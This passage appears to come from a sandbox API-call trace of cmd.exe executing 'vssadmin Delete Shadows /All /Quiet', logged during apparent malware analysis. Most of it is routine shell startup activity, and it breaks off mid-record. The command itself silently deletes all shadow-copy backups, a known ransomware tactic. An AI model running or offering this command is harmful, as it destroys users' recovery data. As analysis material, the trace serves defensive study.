0x7 [0076.704] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0076.705] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.705] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0076.705] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.705] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0076.705] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.705] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0076.706] GetEnvironmentStringsW () returned 0x6a2058* [0076.706] GetProcessHeap () returned 0x690000 [0076.706] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xaca) returned 0x6a2b30 [0076.706] FreeEnvironmentStringsW (penv=0x6a2058) returned 1 [0076.706] GetProcessHeap () returned 0x690000 [0076.706] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4) returned 0x6a0c90 [0076.706] GetEnvironmentStringsW () returned 0x6a2058* [0076.706] GetProcessHeap () returned 0x690000 [0076.706] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xaca) returned 0x6a3608 [0076.706] FreeEnvironmentStringsW (penv=0x6a2058) returned 1 [0076.707] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34ee7c | out: phkResult=0x34ee7c*=0x68) returned 0x0 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x0, lpData=0x34ee88*=0x0, lpcbData=0x34ee80*=0x1000) returned 0x2 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x4, lpData=0x34ee88*=0x1, lpcbData=0x34ee80*=0x4) returned 0x0 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x0, lpData=0x34ee88*=0x1, lpcbData=0x34ee80*=0x1000) returned 0x2 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x4, lpData=0x34ee88*=0x0, lpcbData=0x34ee80*=0x4) returned 0x0 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x4, lpData=0x34ee88*=0x40, lpcbData=0x34ee80*=0x4) returned 0x0 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x4, lpData=0x34ee88*=0x40, lpcbData=0x34ee80*=0x4) returned 0x0 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x0, lpData=0x34ee88*=0x40, lpcbData=0x34ee80*=0x1000) returned 0x2 [0076.707] RegCloseKey (hKey=0x68) returned 0x0 [0076.707] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34ee7c | out: phkResult=0x34ee7c*=0x68) returned 0x0 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x0, lpData=0x34ee88*=0x40, lpcbData=0x34ee80*=0x1000) returned 0x2 [0076.707] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x4, lpData=0x34ee88*=0x1, lpcbData=0x34ee80*=0x4) returned 0x0 [0076.708] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x0, lpData=0x34ee88*=0x1, lpcbData=0x34ee80*=0x1000) returned 0x2 [0076.708] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x4, lpData=0x34ee88*=0x0, lpcbData=0x34ee80*=0x4) returned 0x0 [0076.708] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x4, lpData=0x34ee88*=0x9, lpcbData=0x34ee80*=0x4) returned 0x0 [0076.708] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x4, lpData=0x34ee88*=0x9, lpcbData=0x34ee80*=0x4) returned 0x0 [0076.708] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34ee84, lpData=0x34ee88, lpcbData=0x34ee80*=0x1000 | out: lpType=0x34ee84*=0x0, lpData=0x34ee88*=0x9, lpcbData=0x34ee80*=0x1000) returned 0x2 [0076.708] RegCloseKey (hKey=0x68) returned 0x0 [0076.708] time (in: timer=0x0 | out: timer=0x0) returned 0x5e9c43c9 [0076.708] srand (_Seed=0x5e9c43c9) [0076.708] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c vssadmin Delete Shadows /All /Quiet" [0076.708] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c vssadmin Delete Shadows /All /Quiet" [0076.708] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.708] GetProcessHeap () returned 0x690000 [0076.709] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x210) returned 0x6a2058 [0076.709] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6a2060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0076.709] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0076.709] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0076.709] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.709] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0076.709] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0076.709] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0076.709] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0076.709] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0076.709] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0076.709] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0076.709] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0076.709] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0076.709] GetProcessHeap () returned 0x690000 [0076.709] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2b30 | out: hHeap=0x690000) returned 1 [0076.709] GetEnvironmentStringsW () returned 0x6a2270* [0076.709] GetProcessHeap () returned 0x690000 [0076.709] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xae2) returned 0x6a4bd0 [0076.710] FreeEnvironmentStringsW (penv=0x6a2270) returned 1 [0076.710] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0076.710] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.710] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0076.710] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0076.710] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0076.710] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0076.710] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0076.710] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0076.710] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0076.710] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0076.710] GetProcessHeap () returned 0x690000 [0076.710] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x54) returned 0x6a56c0 [0076.710] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x34fc48 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.710] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x34fc48, lpFilePart=0x34fc44 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34fc44*="Desktop") returned 0x25 [0076.710] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.711] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x34f9c4 | out: lpFindFileData=0x34f9c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6a1ed8 [0076.711] FindClose (in: hFindFile=0x6a1ed8 | out: hFindFile=0x6a1ed8) returned 1 [0076.711] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x34f9c4 | out: lpFindFileData=0x34f9c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6a1ed8 [0076.711] FindClose (in: hFindFile=0x6a1ed8 | out: hFindFile=0x6a1ed8) returned 1 [0076.711] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0076.711] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x34f9c4 | out: lpFindFileData=0x34f9c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe392fd80, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xe392fd80, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6a1ed8 [0076.712] FindClose (in: hFindFile=0x6a1ed8 | out: hFindFile=0x6a1ed8) returned 1 [0076.712] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.712] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0076.712] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0076.712] GetProcessHeap () returned 0x690000 [0076.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4bd0 | out: hHeap=0x690000) returned 1 [0076.712] GetEnvironmentStringsW () returned 0x6a40e0* [0076.712] GetProcessHeap () returned 0x690000 [0076.712] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb36) returned 0x6a5f20 [0076.712] FreeEnvironmentStringsW (penv=0x6a40e0) returned 1 [0076.712] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.712] GetProcessHeap () returned 0x690000 [0076.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a56c0 | out: hHeap=0x690000) returned 1 [0076.712] GetProcessHeap () returned 0x690000 [0076.712] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400e) returned 0x6a6a60 [0076.713] GetProcessHeap () returned 0x690000 [0076.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x54) returned 0x6a2db0 [0076.713] GetProcessHeap () returned 0x690000 [0076.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6a60 | out: hHeap=0x690000) returned 1 [0076.713] GetConsoleOutputCP () returned 0x1b5 [0076.713] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0076.713] GetUserDefaultLCID () returned 0x409 [0076.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a824950, cchData=8 | out: lpLCData=":") returned 2 [0076.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x34fd88, cchData=128 | out: lpLCData="0") returned 2 [0076.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x34fd88, cchData=128 | out: lpLCData="0") returned 2 [0076.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x34fd88, cchData=128 | out: lpLCData="1") returned 2 [0076.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a824940, cchData=8 | out: lpLCData="/") returned 2 [0076.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a824d80, cchData=32 | out: lpLCData="Mon") returned 4 [0076.715] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a824d40, cchData=32 | out: lpLCData="Tue") returned 4 [0076.715] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a824d00, cchData=32 | out: lpLCData="Wed") returned 4 [0076.715] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a824cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0076.715] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a824c80, cchData=32 | out: lpLCData="Fri") returned 4 [0076.715] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a824c40, cchData=32 | out: lpLCData="Sat") returned 4 [0076.715] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a824c00, cchData=32 | out: lpLCData="Sun") returned 4 [0076.715] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a824930, cchData=8 | out: lpLCData=".") returned 2 [0076.715] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a824920, cchData=8 | out: lpLCData=",") returned 2 [0076.715] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0076.716] GetProcessHeap () returned 0x690000 [0076.716] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20c) returned 0x6a2e10 [0076.717] GetConsoleTitleW (in: lpConsoleTitle=0x6a2e10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0076.717] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.717] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0076.717] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0076.717] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0076.718] GetProcessHeap () returned 0x690000 [0076.718] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400a) returned 0x6a6a60 [0076.718] GetProcessHeap () returned 0x690000 [0076.718] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6a60 | out: hHeap=0x690000) returned 1 [0076.718] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0076.718] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0076.718] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0076.718] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0076.718] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0076.718] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0076.719] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0076.719] GetProcessHeap () returned 0x690000 [0076.719] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x6a3028 [0076.719] GetProcessHeap () returned 0x690000 [0076.719] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x1a) returned 0x6a5760 [0076.719] GetProcessHeap () returned 0x690000 [0076.719] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x40) returned 0x6a3088 [0076.720] GetConsoleTitleW (in: lpConsoleTitle=0x34fa80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0076.722] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0076.722] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0076.722] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0076.722] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0076.722] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0076.722] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0076.722] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0076.722] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0076.722] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0076.722] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0076.722] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0076.722] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0076.723] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0076.723] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0076.723] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0076.723] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0076.723] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0076.723] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0076.723] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0076.723] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0076.723] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0076.723] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0076.723] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0076.723] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0076.723] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0076.723] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0076.723] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0076.723] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0076.723] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0076.723] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0076.723] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0076.723] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0076.723] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0076.723] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0076.723] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0076.723] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0076.723] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0076.723] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0076.723] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0076.723] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0076.724] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0076.724] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0076.724] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0076.724] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0076.724] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0076.724] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0076.724] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0076.724] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0076.724] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0076.724] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0076.724] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0076.724] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0076.724] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0076.724] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0076.724] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0076.724] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0076.724] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0076.724] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0076.724] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0076.724] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0076.724] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0076.724] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0076.724] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0076.724] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0076.724] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0076.724] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0076.724] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0076.725] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0076.725] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0076.725] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0076.725] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0076.725] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0076.725] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0076.725] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0076.725] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0076.725] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0076.725] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0076.725] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0076.725] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0076.725] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0076.725] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0076.725] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0076.725] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0076.725] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0076.725] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0076.725] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0076.725] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0076.726] GetProcessHeap () returned 0x690000 [0076.726] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x210) returned 0x6a30d0 [0076.726] GetProcessHeap () returned 0x690000 [0076.726] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x52) returned 0x6a32e8 [0076.726] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0076.726] GetProcessHeap () returned 0x690000 [0076.726] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x418) returned 0x6907f0 [0076.726] SetErrorMode (uMode=0x0) returned 0x0 [0076.726] SetErrorMode (uMode=0x1) returned 0x0 [0076.727] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6907f8, lpFilePart=0x34f5a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34f5a0*="Desktop") returned 0x25 [0076.727] SetErrorMode (uMode=0x0) returned 0x1 [0076.727] GetProcessHeap () returned 0x690000 [0076.727] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6907f0, Size=0x66) returned 0x6907f0 [0076.727] GetProcessHeap () returned 0x690000 [0076.727] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x6907f0) returned 0x66 [0076.727] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0076.727] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0076.727] GetProcessHeap () returned 0x690000 [0076.727] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x120) returned 0x6a3348 [0076.727] GetProcessHeap () returned 0x690000 [0076.727] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x238) returned 0x690860 [0076.735] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x690860, Size=0x122) returned 0x690860 [0076.735] GetProcessHeap () returned 0x690000 [0076.735] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x690860) returned 0x122 [0076.735] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0076.735] GetProcessHeap () returned 0x690000 [0076.735] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xe0) returned 0x6a3470 [0076.736] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6a3470, Size=0x76) returned 0x6a3470 [0076.736] GetProcessHeap () returned 0x690000 [0076.736] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x6a3470) returned 0x76 [0076.737] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.737] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x34f31c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34f31c) returned 0xffffffff [0076.738] GetLastError () returned 0x2 [0076.738] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x34f31c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 